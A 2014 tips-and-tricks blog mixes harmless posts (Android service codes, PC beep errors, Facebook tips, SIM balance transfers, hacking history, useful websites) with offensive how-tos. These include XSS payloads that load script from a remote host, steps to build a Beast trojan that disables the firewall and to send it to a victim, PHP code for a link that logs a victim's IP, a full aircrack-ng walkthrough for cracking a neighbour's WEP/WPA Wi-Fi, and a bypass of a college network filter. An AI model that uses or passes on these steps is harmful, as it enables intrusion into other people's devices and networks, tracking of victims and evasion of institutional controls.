Tuesday, 27 May 2014

Android secret codes




For IMEI Number: *#06#

For RAM Memory version: *#*#3264#*#*

For FTA SW version: *#*#1111#*#*

For FTA HW version: *#*#2222#*#*

For Touchscreen version: *#*#2663#*#*

View Phone Lock Status: *#7465625#

Executes Emergency Dial Screen to unlock PUK
Code: **05**#

Enables Voice Dialing Logging Mode:
*#*#8351#*#*

Disables Voice Dialing Logging Mode:
*#*#8350#*#*
Change behavior of Power button:
*#*#7594#*#*

To test Vibration and Back-light of device:
*#*#0842#*#*

To test Proximity/Distance Sensor:
*#*#0588#*#*

To test Touchscreen: *#*#2663#*#*

For Audio Test: *#*#0289#*#* 
or
*#*#0673#*#*

To launch Service Mode: *#*#197328640#*#*

Hidden Service Menu (Motorola Droid):
##7764726

Field Test: *#*#7262626#*#*

To format the phone: *2767*3855#

To start GTalk Monitoring: *#*#8255#*#*

To get PDA, Phone, H/W and RF Call Date:
*#*#4986*2650468#*#*

Displays Build Time and Change List number:
*#*#44336#*#*

Packet Loopback Test: *#*#0283#*#*

LCD Display Test: *#*#0*#*#*

Enter Service Menu (on New Phones): *#0*#

Diagnostic Configuration: *#9090#

USB Logging Control: *#872564#

System Dump Mode: *#9900#

To test Bluetooth: *#*#232331#*#*

To display Bluetooth Physic Address:
#*#232337#*#

To test secret GPS: *#*#1472365#*#*

To test other GPS: *#*#1575#*#*

To test WiFi/Wireless LAN of phone:
*#*#232339#*#*
 or 
*#*#528#*#*
 or
*#*#526#*#*
To display Wi-Fi MAC Address:
*#*#232338#*#*

To Restore Factory Settings: *#*#7780#*#*

To create Immediate backup of your multimedia
files: *#*#273282*255*663282*#*#*

To display Phone Information: *#*#4636#*#*

To get detailed Camera Information:
*#*#34971539#*#*

For Software & Hardware Information:
*#12580*369#

To display HSDPA/HSUPA Control Menu:
*#301279#
Read more ...

Some common PC error which u face in your daily life and their solutions:-



1. MONITOR LED IS BLINKING
Check all the connections like Monitor Cable, Data
cables,RAM, Display Card , CPU connections.

2. CONTINUOS THREE BEEPS
Problem in RAM Connection.

3. THREE BEEPS ( 1 Long 2 Short)
Problem in Display Card Connection

4. THREE LONG BEEPS PERIOD WISE
Problem in BIOS or RAM (Basic Input Output
System)

5. CONTINUOS NON-STOP BEEPING
Key Board Problem (I.e.; Some Key is pressed for
Longer time)

6. FDD LED IS GLOWING CONTINUOSLY
Data cable to be connected properly (twisted
cable).

7. NO DISPLAY ON THE SCREEN AT ALL
Hard Disk cable connected wrongly. Connect
rightly seeing the Red mark (Faces power supply)
and then Restart.

8. POWER LED IS OFF
a. Check main power cord
b. Check S.M.P.S.
c. Check Mother Board connection

9. SHOWING CMOS ERROR
Replace 3 Volt battery of Mother Board . Set
Original Settings Manually.(ReferCMOS Setup
chart) Enter your search termsSubmit search form

10. SHOWING FDD ERROR OR FLOPPY DRIVE IS
NOT WORKING PROPERLY
Check Power cord of FDD , Data Cables , set
CMOS & Finally the Check drive.

11. SHOWING HDD ERROR OR HARD DISK
FAILURE
a. Check Power Cord
b. Check connection of HDD
c. Check Data cable
d. Check Hard Disk parameters in CMOS or Auto
detecting Setting Partitions by Fdisk Command,
then format it to set track 0.

12. MOTHER BOARD HANGS DUE TO
UNSTABILIZED POWER SUPPLY
a. Check S.M.P.S
b. RAM not functioning properly.
c. Software problem (due to using pirated
software)
d. CPU fan not functioning properly.

13. DANCING SCREEN
a. Check Display card connection
b. Virus Problem
c. Video Memory Problem

14. SHAKING SCREEN
a. Earthing problem
b. Magnetic waves comes around.

15. CPU CABINET SHOCK
a. Check Earthing
b. Check main power cord.

16. NON-SYSTEM DISK ERROR
a. Floppy Drive having different disk (Non-
Bootable Disk) OR CMOS Parameters for Hard Disk
may not be set properly.
b. Hard Disk Partitions may not be created.
c. Hard Disk may not be formatted.

17. MISSING OPERATING SYSTEM
The System files missing namely Ie;
command.com} -
User File IO.SYS & MS_DOS.SYS } - Hidden Files.
These above three files required for Start up of the
system that can be transferred by using SYS C:
Command OR
While the time of formatting by using Format c:/u/s

18. MISSING COMMAND INTERPRETOR
May the file Command.com is corrupted OR
Infected by Virus OR Some one has Erased it.

19. SHOWING I/O ERROR
a. The type of Hard Disk in CMOS may not be set
properly.
b. Operating system used for formatting is not
valid

20. SHOWING DIVIDE OVER- FLOW MESSAGE
a. May some Directories or Files crash with other
files.
b. Use CHKDSK/F or SCANDISK Command to
correct it.

21. HARD DISK MAKING NOISE WHILE
PROCESSING
a. Unstabilized power supply.
b. Check for Loose Contact.
c. Do not use Y Connectors for Hard Disk.
d. It may create Bad Sector OR Weak Hard Disk.

22. HARD DISK HANGS WHILE PROCESSING
Check for Bad Sector by using CHKDSK or
SCANDISK Command. If found format the Hard
Disk and set Partition before that area.(This is the
only procedure to use Hard Disk with Bad Sector)
OR (To avoid Bad Sectors use Standard Power
Supply)

23. HARD DISK NOT DETECTED
a. Check Power Connector
b. Check Data Cables
c. Check Jumpers

24. PARTITION NOT SHOWN
Operating System where the Hard Disk formatted
is not supported with present Mother Board. For
Eg: Hard Disk formatted with Pentium System will
hide their partitions for 486 System.

25. MMX/DLL FILE MISSING
May the above files may be corrupted due to
power failure or Virus. Make available above files
from other Computer. OR Reinstall Windows 98
Operating System. (This procedure will not make
any effect on existing Data).

~MUST LIKE & SHARE~
Read more ...

Tuesday, 13 May 2014

Basic XSS Cross Site Scripting Demo


Basic XSS Cross Site Scripting Demo

Allot of you guys aren't clear with xss aka cross site scripting and for that many of you were sending me mails on how to do xss attack , etc and that's why i got this video which explains some basic concepts of the Xss attack and how it can be practiced and how can we use it to hack anybody. 

This video is controversial by Brial Contos, CISSP from a company named IMPERVA. it takes through each and every step involved to find a xss vulnerability in a webpage . and showcases some of the basic steps that you need to know.

What is XSS

Cross-site scripting ('XSS' or 'CSS') is an attack that takes advantage of a Web site vulnerability in which the site displays content that includes un-sanitized user-provided data. For example, an attacker might place a hyperlink with an embedded malicious script into an online discussion forum….

That purpose of the malicious script is to attack other forum users who happen to select the hyperlink. For example it could copy user cookies and then send those cookies to the attacker. 


Conclusion

Now you might be clear with xss attacks it is easy and can be used in man terms to hack anybody or anything else for fun also. Now lets take a look at some of the commonly used xss scripts and code snippets -

Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector:
<SCRIPT SRC="http://pavanjoshi2050.blogspot.in/xss.jpg”></SCRIPT>

This is most simplest snippet used to find a Xss vulnerability in a webpage.
<SCRIPT>alert('XSS');</SCRIPT>

This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):
<SCRIPT SRC=”http://pavanjoshi2050.blogspot.in/xss.js”></SCRIPT>

There are many more xss vulnerabilities you can use to bypass the security but they are most useful to find a xss vulnerability in webpage.
Read more ...

Monday, 12 May 2014

How to increase Computer RAM ?




Beside using Physical RAM available in your computer, software programs also use Virtual RAM. If you increase Virtual RAM of your computer then most probably the speed of your computer will also increase.

Follow the Given Steps to increase virtual RAM :-

For Windows XP users :

1. Goto ‘Properties’ of My Computer 

2. Click on ‘Advance’ Tab 

3. Under ‘Performance’ section click on ‘Settings’ button 

4. Now Move to ‘Advance’ Tab 

5. Under ‘Virtual memory’ Section click on “Change” button 

6. Now Select Drive “C” .

7. Select Option “Custom Size” 

8. Set Initial Size (MB) to 5000 for 5GB 2000 for 2GB or Whatever suitable for you. We will recommend you to keep at least 2000 

9. Set Maximum Size to 5000 for 5GB, this means 5GB of Local Disk C will be used as Virtual Memory. Better keep it as High as You can afford.

10. Click on “Set” Button 

11. Perform this with all other Drives also 

12. Click on “OK” Button 

13. Again Click on “OK” Button 

14. Again Click on “OK” Button That’s it.

Read more ...

How To Hide Folder In MOBILE Without Any Software !!




1..Just go to the folder which you want to hide
2..Now rename the folder with adding “.jad” without
quotes at the end of folder’s name



E.g you want to hide
your Songs folder then just go to the place where the folder is and rename it as songs.jad
3..Now create another folder with same name in the same place but add “.jar” without quotes at the end of the folder’s name E.g info.jar
4..Now you have hide the file safely from unwanted eyes.
5..If u want to view the folder again delete the folder of  ".jar" and folder will be unhidden.

NOTE : In case of songs and videos it will be shown in music player . . .
Read more ...

How To Hide Drives in Windows:




1.Go to run .

2.Type "diskpart".

3.Type "list volume".

4.Now select the volume you want to hide by typing "select volume n"(n is the volume number against the drive you want to hide).

eg: select volume 2.

5.Type "revome letter x"(x is the drive name).eg: remove letter D.
Done, now check my computer .

If you want to show the drive again then repeat step 1 to 4 then type "assign letter x".
**Dont try with drive C **

** If you have locked something with Folderlock or other software then after assigning the drive everything will be unlocked ;)**
Read more ...

HOW TO HACK VICTIM PC USING BEAST TROJAN


only for educational purpose:-

NOTE : i'm nt responsible fr any damage


=================================
step1:download beast trojan google n install it

step2: unrar the pack

step3: Open The software you will get the screen
HOW TO MAKE A TROJAN USING BEAST TROJAN

STEP1:Now Click on ” Build server ” button.

step2:now click on notofication tab

step3:In the notifications tab click on the e-mail
button.

step3:now fill ur proper email

step4: Now Go to “AV-FW kill ” tab.

step5:now put a tick mark on the ” disable XP
firewall “.

step6: Now Click on “EXE icon ” tab.

step7:n now u can choose any icon for the file
from the list or you
can browse the icon from the directory and can
use it.

step8: Now click on the ” Save Server ” button and
the Trojan Will be made.

step9: Now Send this Trojan File to victim.

step10: As and when the victim will install the
trojan on his system you will get a notification e-
mail on your specified e-mail id while making the
trojan. This Email consist of the IP address and
port of the victim.

step11:now put his ip address in a ''host colum" n
put his port in "port colum"

step12:After That Click on the “Go Beast ” Button
and You will be connected to victims PC.

step13: Now Select the action or task you want to
execute on victims PC form the given list.

step14:Now to destroy or kill the trojan click on
the ” server ” tab from the menu.

step15:- Now Click on the ” Kill Server ” button
and the trojan will be destroyed from the victims
PC.

then u r done
Read more ...

How to grab someone's IP address?



1) Copy the below codes into Notepad and save it
as Grab.php (.php is must)
2)
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE
_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number
,10,102,153);
$textcolor = imagecolorallocate($img_number
,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X
_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
Imagestring($img_number,10,5,5,$number0,$text
color);
Imagestring($img_number,10,5,25,$number1,$tex
tcolor);
Imagestring($img_number,10,5,45,$number2,$tex
tcolor);
Imagestring($img_number,10,5,50,$number4,$tex
tcolor);
Imagestring($img_number,10,8,50,$number4,$tex
tcolor);
Imagestring($img_number,10,5,10,$number4,$tex
tcolor);
Imagestring($img_number,10,8,10,$number4,$tex
tcolor);
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.tx
t","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER
[HTTP_X_FORWARDED_FOR] - Host: $hostname -
'\n' ";
fwrite($file, $file2);
fclose($file);
?>
3) Now make Free account on any of the free web
hosting sites Ripway.com or on My3gb .

4) Now Upload Grab.php to your web hosting site.

5) Copy the link of your uploaded file and send it
to victim.

6) As soon as victim will click on your link his ip
will be saved in your free web hosting site.

7) Enjoy you are Done and Share with your friends

NOTE: Never use any of the tricks for
something evil always love what you do and do it
legally
Read more ...

How to format an unformatable Pendrive



Step 1. Turn on computer as normal

Step 2. Once you are in your desktop insert
Pendrive into USB port

Please note: if you know the letters associated
with your disk locations or can use a utility such as
disk part to list this information then skip steps 3 and 4



Step 3. Go into my computer (accessible from the
start menu or desktop) and look down the
navigation panel on the left hand side, this lists
down to the popular and root menu folders and
locations on your computer.

Step 4. Your Pendrive should be listed in one of
these locations, it may be referred to by brand, as
portable storage or something similar. Next to this
label will be a letter,

for example “G: removable storage device ” if the
device does not show up you may need to test the
port to find the letter with another USB device.
This
letter needs to be written down or remembered in
order to complete this process.

Step 5. Go to the windows start menu, click start
or

the Windows symbol depending on your edition of
Windows, then click run.

Step 6. Type cmd into the run dialog box and click
OK, this is to start the command prompt window
from which you will be able to choose your format
style and name your drive.

Step 7. Then the command prompt window is
opened and you will need to type “ Format G: “
if you want to Format it as FAT32 then type “
Format G: /FS: FAT32 ”

Step 8. The G in this instance refers to our
example
Pendrive location, instead you would enter the
letter that you remembered or wrote down from
the
my computer side panel
After you have typed the above command press
enter.

Step 9. Here, you will be asked to press enter
again
and then to give a name for your drive. Follow
these prompts then click on enter again.
Like ·  · Share
Read more ...

How to Crack wifi network’s password:-




Hello and welcome to my tutorial about wireless networking.

Today I’ll be teaching you how easy it is to obtain access to a wireless protected network by cracking the Wi-Fi network’s password.

There are lots of questions coming from the beginners on how to get WEP/WPA/WPA2 password and accessing neighbor’s wi-fi connection.

We all should be aware of fact that Wep Encrpytion is easy to crack while WPA and WPA2 is comparatively difficult and it needs a handshake dictionary. 

Here, we will be covering all of the aspects and ways of hacking a wi-fi network using backtrack and gaining access to the router.
==>>How to Crack WEP password
What You need to succeed-

wep

A compatible wireless adapter—This is the biggest requirement to hack any wi-fi network. You’ll need a wireless adapter that’s capable of packet injection, and chances are the one in your computer is not.

A BACKTRACK CD-Download yourself a copy of the backtrack CD and burn it, or load it up in VMware to get started.
A nearby WEP-enabled Wi-Fi network. The wep signal should be strong and ideally people are using it, connecting and disconnecting their devices from it.

Okay so let’s begin, so first we need to open a terminal of backtrack. To do that, just click the little icon that’s on the right side from System. Please see the image below:

backtrack
STEP 1:

Type the command- airmon-ng

This command displays our interfaces.In my case I have wlan0, and now we are going to put it into monitor mode.
STEP 2:

Type- airmon-ng start wlan0.

As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.

backtrack
STEP 3:

Type airodump-ng mon0 and that will start scanning for wi-fi networks. As you can see, there is a network called SKIDHACKER. Take a note of the BSSID the DATA, the CHANNEL and the type of ENCRYPTION. Please refer to the image below, if you have any trouble getting to that point.

wifi-hacking
STEP 4:

Now we are going to set it to lock on a specific wi-fi network named SKIDHACKER. To do that, type airodump-ng -c (channel) -w WEPcrack –bssid (bssid of the network) mon0. Replace (channel) with the channel of the victim’s network, and replace (bssid of the network) with the bssid of the victim’s network.

hack wifi passwords

Okay so as you can probably see the data is going really slow, and we need to boost that up. We are going to need a lot more data, so let’s preform one of the aireplay commands that will boost that data.
STEP 5:

Firstly, open up a new terminal and type aireplay-ng -1 0 -a (bsisd) mon0 where (bssid) is the bssid of the network. Now if your Wi-Fi card is supported, you should see Association successful , if you don’t see that then your card is not supported.

hack wifi passwords
Step 6:

Now we are going to type in aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0. And now when the question Use this packet ? pops up, just push the letter y. And now as you can see in the image below, the data went high drastically.

backtrack
STEP 7:

Okay so now lets open a new terminal and we are going to attempt to crack it with the amount of data we have. I recommend getting over 20000 data before trying. So let’s type aircrack-ng WEPcrack*.cap. Replace WEPcrack with the filename you chose before when capturing the data, and don’t forget to add that asterisk after the file and the extension which is .cap.

crack wifi network’s password
STEP 8:

And now it will attempt to get the password. Just wait a couple of minutes for it to complete, and once it did it will say KEY FOUND! [ XX:XX:XX:XX:XX ] where the X’s will be random numbers and/or letters. That’s not it, now to connect you will need to remove the semicolumns. For an example, if we were to have 12:34:52:66:59, the password would be 1232526659.

Just log in to your Windows OS, and connect using
 that password.

==========================================

==========================================
==>>How to Crack WPA/WPA2 Passowrd

wpa encryption

So lets begin. What you will need for this crack is a dictionary file that we are going to use to get the WPA/WPA2 password.

Remember, the bigger the dictionary file is the greater the chance you have in cracking the password.

So now you are probably wondering, where do I get a dictionary file? Well, I don’t know if this is allowed or not but I recently downloaded a 1.9GB dictionary file.You can google for it.
STEP 1:

Okay, so firstly open up a terminal and once we have the terminal open we are going to type in airmon-ng which will display our wireless interfaces.

In my case I have wlan0, and now we are going to put it into monitor mode.

wireless hacking
STEP 2:

Type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.
STEP 3:

Lets type in airodump-ng mon0 and this command is going to initiate the scanning process for wifi networks. As you can see in the picture below, a few WPA encrypted networks should pop up. I’m going to attempt to crack the network under the bssidSKIDH?CKER. Take a note of the channel, and you want to copy the BSSID for later use.

hack wifi
STEP 4:

Now type airodump-ng -c (channel) -w (filename) –bssid (bssid) mon0, and replace the values to fit what you got from the last step. Don’t forget to remember what filename you chose, because we are going to need that at the end.

hack wifi passwords
What is needed to get the WPA or WPA2 key is something called a WPA Handshake. You can obtain a handshake by kicking someone off the network, and those computers will automatically reconnect which will give you the handshake.

This means, if there is no one on the network, you can’t get a handshake, and you can’t crack the security of WPA network.
STEP 5:

So how do we know if someone is connected?Well look at the lower part of the airodump command, and you will notice something as STATION, and underneath that if someone is connected it wil show you their mac address.

WPA handshake

Once you get a handshake, airodump will alert you in the top screen, and the handshake will be located right from the time stamp.
STEP 6:

Okay, so lets open up a new terminal and we are going to kick off the computers connected. Lets type in aireplay-ng -1 0 -a (bssid) mon0. Replace bssid with the network you are trying to crack and hit enter. It is going to attempt to kick off a client, and if it succeeds you will see the wpa handshake at the top right corner, if you don’t run the aireplay command a couple of times.

Backtrack

So now that we have a wpa handshake file, we are going to attempt to crack it.
STEP 7:

Lets stop the scan by pressing CONTROL + C on the terminal where airodump is running. Now in order to find the handshake file, you need to go in the top menu and chose Places > Home Folder. Okay, so lets open up a terminal and we are going to type in aircrack-ng -w (dictionary) /root/(filename). Where filename is the filename you specified when capturing the wpa handshake and the dictionary is the path of the wordlist you downloaded.
STEP 8:

This can be done by dragging in the handshake file into the terminal after the aircrack-ng -w (dictionary) command and it will parse in it’s directory. All you need to do is hit enter. The password needs to be in the dictionary file, so the bigger the wordlist is the bigger are the chances of you getting the password.

handshake
If the password is in the wordlist, it will give you a success message and the key in brackets.
Happy hacking..!

commands

=>> airmon-ng
This backtrack command displays the wireless interfaces.

=>> airmon-ng start wlan0
This command starts monitoring mode on a wi-fi device.

=>> airodump-ng mon0
This command shows all of the wi-fi networks online.

=>> airodump-ng -c (channel) -w (filename) –bssid (bssid) mon0
This command specifies the wi-fi device to concentrate to one network.

=>> aireplay-ng -1 0 -a (bssid) mon0
This command kicks off clients that are connected, and gets the handshake.

=>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
This command boosts the data, when cracking WEP.

=>> aircrack-ng -w (dictionary) (wpa handshake)
This command is used when cracking WPA or WPA2 networks.

=>> aircrack-ng (filename)*.cap
This command is used when cracking WEP networks.

Read more ...

HOW TO ACTIVATE SIM CARD INSTANTLY


SPECIAL POST Must Like And Share..... 

When u buy any new sim . The shopkeeper will tell u to wait few hours/days to get the sim
activated. ..
when u purchase a new sim card u will get two or three papers in which you have to fill the details.. .
check the page in which your mobile number is written. and near your number you can see SR NUMBER.[serial number] . . .
you can also find SR. No. on sim card's slip on plastic cover.

IF YOU WANT INSTANT ACTIVATION THEN
INSERT SIM IN YOUR MOBILE AND DIAL THE SERIAL NUMBER TWO TIMES.. . ..Thats all..your sim card'll be activated within one
minute.
Read more ...

the history of hacking (must read)




Hacking has been around for more than a century. In the 1870s, several teenagers were flung off the country's brand new phone system by enraged authorities. Here's a peek at how busy hackers have been in the past 35 years.





Early 1960s

University facilities with huge mainframe computers, like MIT's artificial intelligence lab, become staging grounds for hackers. At first, "hacker" was a positive term for a person with a mastery of computers who could push programs beyond what they were designed to do.

Early 1970s

John Draper John Draper makes a long-distance call for free by blowing a precise tone into a telephone that tells the phone system to open a line. Draper discovered the whistle as a give-away in a box of children's cereal. Draper, who later earns the handle "Captain Crunch," is arrested repeatedly for phone tampering throughout the 1970s.

Yippie social movement starts YIPL/TAP (Youth International Party Line/Technical Assistance Program) magazine to help phone hackers (called "phreaks") make free long-distance calls.

Two members of California's Homebrew Computer Club begin making "blue boxes," devices used to hack into the phone system. The members, who adopt handles "Berkeley Blue" (Steve Jobs) and "Oak Toebark" (Steve Wozniak), later go on to found Apple Computer.

Early 1980s

Author William Gibson coins the term "cyberspace" in a science fiction novel called Neuromancer.

In one of the first arrests of hackers, the FBI busts the Milwaukee-based414s (named after the local area code) after members are accused of 60 computer break-ins ranging from Memorial Sloan-KetteringCancer Center to Los Alamos National Laboratory.

Comprehensive Crime Control Act gives Secret Service jurisdiction over credit card and computer fraud.

Two hacker groups form, the Legion of Doom in the United States and the Chaos Computer Club in Germany.

2600: The Hacker Quarterly is founded to share tips on phone and computer hacking.

Late 1980s

The Computer Fraud and Abuse Act gives more clout to federal authorities.

Computer Emergency Response Team is formed by U.S. defense agencies. Based at Carnegie Mellon University in Pittsburgh, its mission is to investigate the growing volume of attacks on computer networks.

At 25, veteran hacker Kevin Mitnick secretly monitors the e-mail of MCI and Digital Equipment security officials. He is convicted of damaging computers and stealing software and is sentenced to one year in prison.

First National Bank of Chicago is the victim of a $70-million computer heist.

An Indiana hacker known as "Fry Guy" -- so named for hacking McDonald's -- is raided by law enforcement. A similar sweep occurs in Atlanta for Legion of Doom hackers known by the handles "Prophet," "Leftist" and "Urvile."

Early 1990s

After AT&T long-distance service crashes on Martin Luther King Jr. Day, law enforcement starts a national crackdown on hackers. The feds nab St. Louis' "Knight Lightning" and in New York grab Masters of Deception trio "Phiber Optik," " Acid Phreak" and "Scorpion." Fellow hacker "Eric Bloodaxe" is picked up in Austin, Texas.

Operation Sundevil, a special team of Secret Service agents and members of Arizona's organized crime unit, conducts raids in 12 major cities, including Miami.

A 17-month search ends in the capture of hacker Kevin Lee Poulsen ("Dark Dante"), who is indicted for stealing military documents.

Hackers break into Griffith Air Force Base, then pewwwte computers at NASA and the Korean Atomic Research Institute. Scotland Yard nabs "Data Stream," a 16-year-old British teenager who curls up in the fetal position when seized.

A Texas A&M professor receives death threats after a hacker logs on to his computer from off-campus and sends 20,000 racist e-mail messages using his Internet address.

Kevin Mitnick [photo / AP ]In a highly publicized case, Kevin Mitnick is arrested (again), this time in Raleigh, N.C., after he is tracked down via computer by Tsutomu Shimomura at the San Diego Supercomputer Center.

Late 1990s

Hackers break into and deface federal Web sites, including the U.S. Department of Justice, U.S. Air Force, CIA, NASA and others.

Report by the General Accounting Office finds Defense Department computers sustained 250,000 attacks by hackers in 1995 alone.

A Canadian hacker group called the Brotherhood, angry at hackers being falsely accused of electronically stalking a Canadian family, break into the Canadian Broadcasting Corp. Web site and leave message: "The media are liars." Family's own 15-year-old son eventually is identified as stalking culprit.

Hackers pierce security in Microsoft's NT operating system to illustrate its weaknesses.

Popular Internet search engine Yahoo! is hit by hackers claiming a "logic bomb" will go off in the PCs of Yahoo!'s users on Christmas Day 1997 unless Kevin Mitnick is released from prison. "There is no virus," Yahoo! spokeswoman Diane Hunt said.

1998

Anti-hacker ad runs during Super Bowl XXXII. The Network Associates ad, costing $1.3-million for 30 seconds, shows two Russian missile silo crewmen worrying that a computer order to launch missiles may have come from a hacker. They decide to blow up the world anyway.

In January, the federal Bureau of Labor Statistics is inundated for days with hundreds of thousands of fake information requests, a hacker attack called "spamming."

Hackers break into United Nation's Children Fund Web site, threatening a "holocaust" if Kevin Mitnick is not freed.

Hackers claim to have broken into a Pentagon network and stolen software for a military satellite system. They threaten to sell the software to terrorists.

The U.S. Justice Department unveils National Infrastructure Protection Center, which is given a mission to protect the nation's telecommunications, technology and transportation systems from hackers.

Hacker group L0pht, in testimony before Congress, warns it could shut down nationwide access to the Internet in less than 30 minutes. The group urges stronger security measures.
Read more ...

Hide Files Behind Image.



Note: I am writing this for educational purpose only. Do not make misuse of my blog.

Hide Files Behind Image (steganography).

1. Select an image to be used for hiding file behind the image.

2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.

3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.

4. Now open cmd by going to Start > Accessories > Command Prompt and type following commands in it.

cd desktop

5. After that type command given below.

 Copy /b imagename.jpg + filename.rar = finalimage.jpg

6. Here replace imagename, filename and finalimage with your image and file names.

NOTE: According to data the size of the image also increases.

How to see the data behind the image?
Open the image with WinRAR and you will even see the file hidden.
Read more ...

Sunday, 11 May 2014

Best Facebook tips and tricks






Everyone knows Facebook, but not everyone knows Facebook very well. You could spend your days on the world’s biggest social network liking and sharing, or you could learn a few tricks that will bring you closer to being a power user.
These 13 Facebook tricks will help you take charge of your Facebook activity, as well as earn you some savvy credit-points with other Facebook users. Use them wisely! If you have Facebook secrets of your own to share – do tell and leave us a comment!

1. Create & Manage Friends’ Lists

Organize your friends in lists and control who can view what’s on your profile. Go to Facebook Lists Page and see the default lists prepared for you. Click on “Create List” to make your own.

2. Schedule Posts

Want to make sure your posts go live even when you’re offline? Use Facebook’s scheduling tool and set a publishing time for your posts. Click on the clock icon in the status line field and take it from there.

3. Create a Secret Group

Make your own private space on Facebook and invite only people that you want! Go to Facebook Groups Page and click “Create Group”, then choose the “Secret” option.

4. Download Entire Photo Albums

Want to make sure your Facebook photos are safe? Save them to your computer! Use Pick’n’Zip to log in with your Facebook account and choose the albums you’d like to download.

6. Choose Who Can See You on Facebook’s Online Chat 

No need to apologize. We all have some people on our files that we don’t always feel like talking to. All you have to do is the click the ‘Settings’ icon at the bottom of the chat section, go to “Advanced Settings” and make your choice.

7. Post Upside-Down Texts

Drive your pals a little nuts with FlipText, a fun Facebook trick that automatically turns everything you write upside down. Just a simple copy/paste and your post is flipping.

8. Language/Geo-Target Fan Page Posts

Did you know you can make your posts visible only to people in your city? Or only to people in a certain country who speak a certain language? When you write a post, change the “Public” status according to your wishes and target your specific group of interest.

9. Edit Your Published Comments

Typos? Misunderstandings? Freudian slips? Thankfully, Facebook lets users edit their comments quite easily. All you need to do is roll over the comment, click on the pencil icon and edit away!

10. Have Some Laughs with Pirate English

Normal languages aren’t nearly as fun as pirate talk! You can change the entire Facebook terminology to pirate English by going to your Account Settings and changing the language choice. Forget about Likes, they’re called “Arrr, This be pleasin’ to me eye” now.

11. Discover Messages that Facebook Hides

Not many people know that Facebook messages get split into two folders: Messages and Other. If you haven’t looked into the Other folder before, you probably missed some messages you didn’t want to miss.

12. Turning Off Notifications from Apps, Users, Etc.

Have too much spam coming in from an event, a group or a page? You can shut notifications off by clicking on the notifications icon (the globe), rolling over the nuisance with your mouse and clicking X to delete. Faceboook will then ask you if you want to turn off notifications from that user permanently.

13. Customize Your “Posted Via” Line

Another fun trick you can do to spice up your Facebook posts is to add a customized “Posted Via” line with this awesome Facebook tool. You can publish your posts from Air Force One, from a banana phone or via Jedi mind control, to name just a few.

14. Delete Your Facebook Account

If the day comes when you decide to leave the blue planet and go out into the real world, this link will be the red pill that takes you there. Hope you enjoyed the ride.
red pill vs blue pill
Read more ...

balance transfer trick for all cards


BALANCE TRANSFER WAYS IN OPERATORS

transfer balance in very easy steps





Airtel :
To Transfer Balance In Airtel Just Dial *141# And Follow The Onscreen Instructions. You Can Transfer From 5 To 30 RupeesOf Balance In Airtel.

Tata Docomo :
To Transfer Balance In Tata Docomo SMS as BT MobileNumber Amount And Send It To 54321. E.g. BT 1234567890 30 To Transfer 30 Rupees Of Balance.

!dea :
To Transfer Balance In !dea Network Send SMS as GIVE MobileNumber Amount And Send It To 55567. E.g. GIVE 1234567890 30 to transfer 30 rs.

Vodafone :
To Transfer Balance In Vodafone Dial *131*Amount*Mobile No# E.g. *131*50*1234567890# To Transfer 50 Rupees Of Balance.

Uninor :
To Transfer Balance In Uninor Just Dial *202*MobileNumber*Amount# E.g. *202*1234567890*30# To Transfer 30 Rupees.

Aircel :
To Transfer Balance In Aircel Just Dial *122*666# And Follow The Instructions. You Can Transfer 5, 10, 20 Or 100 Rupees Of Balance.

BSNL :
To Transfer Balance In BSNL Just Send SMS GIFT MobileNumber Amount To 53733. E.g. GIFT 1234567890 50 to Transfer 50 Rupees Of Balance...

Read more ...

Access free internet in your college bypassing security password




This trick will enable u to use internet if u dont know the password of Cyberoam (using tool "Tunnelguru")

 (eg: Cyberoam)

So at 1st goto: www.tunnelguru.com
Register yourself and Click on "Free download". Download the small software for ur 32/64 bit systems.

(U may also need to install Java SRE available on the same download page in case of java error)

***
Now open the software

under VPN Tunnel select a Demo server and

Rport - 53 ; Lport - 0

Protocol: UDP

provide your own username password and access the internet !
Read more ...

List Of 105 Useful Websites !!!!!!!!!!!!!!!



#must share and like 
105 usefull websites 

1. screenr.com – Record movies of your desktop and send them straight to YouTube.

2. bounceapp.com – For capturing full length screenshots of web pages.

3. Goo. gl – Shorten long URLs and convert URLs into QR codes
.
4. untiny.me – Find the original URLs that’s hiding behind a short URLs.

5. localti.me – Know more than just the local time of a city

6.copypastecharacter.com– Copy-paste special characters that aren’t on your keyboard.

7. topsy.com –A better search engine for twitter.

8. fb.me/AppStore –Search iOS apps without launching iTunes.

9. iconfinder.com –The best place to find icons of all sizes.

10. office.com –Download templates, clipart and images for your Office documents.

11. woorank.com –everything you wanted to know about a website.

12. virustotal.com –Scan any suspicious file or email attachment for viruses.

13. wolframalpha.com– Gets answers directly without searching .

14.printwhatyoulike.com– Print web pages without the clutter.

15. joliprint.com –Reformats news articles and blog content as a newspaper.

16. isnsfw.com – When you wish to share a NSFW page but with a warning.

17. eggtimer.com – A simple online timer for your daily needs.

18. coralcdn.org – If a site is down due to heavy traffic, try accessing it through coral CDN.

19. random.org – Pick random numbers, flip coins, and more.

20. mywot.com –Check the trust level of any website .

21. viewer.zoho.com –Preview PDFs and Presentations directly in the browser.

22. tubemogul.com –Simultaneously upload videos to YouTube and other video sites.

23. truveo.com – The best place for searching web videos.

24. scr.im – Share your email address online without worrying about spam.

25. spypig.com – Now get read receipts for your email.

26. sizeasy.com –Visualize and compare the size of any product.

27. whatfontis.com –quickly determine the font name from an image.

28. fontsquirrel.com –A good collection of fonts – free for personal and commercial use.

29. regex.info – Find data hidden in your photographs .

